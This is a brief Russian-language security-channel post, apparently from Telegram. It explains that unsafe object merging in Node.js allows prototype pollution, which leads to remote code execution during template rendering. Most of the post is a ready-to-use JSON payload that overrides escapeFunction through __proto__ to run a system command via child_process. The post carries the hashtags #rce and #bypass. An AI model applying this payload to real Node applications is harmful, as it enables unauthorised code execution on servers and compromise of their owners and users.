Небезопасное объединение объектов позволяет эксплуатировать уязвимость Prototype Pollution, которая приводит к удалённому выполнению кода при рендеринге шаблонов.
{"__proto__":{"client":true,"escapeFunction":"function(){return process.mainModule.require('child_process').spawnSync('id').stdout;};//"}}#node #rce #bypass
👉 @cybersecinform
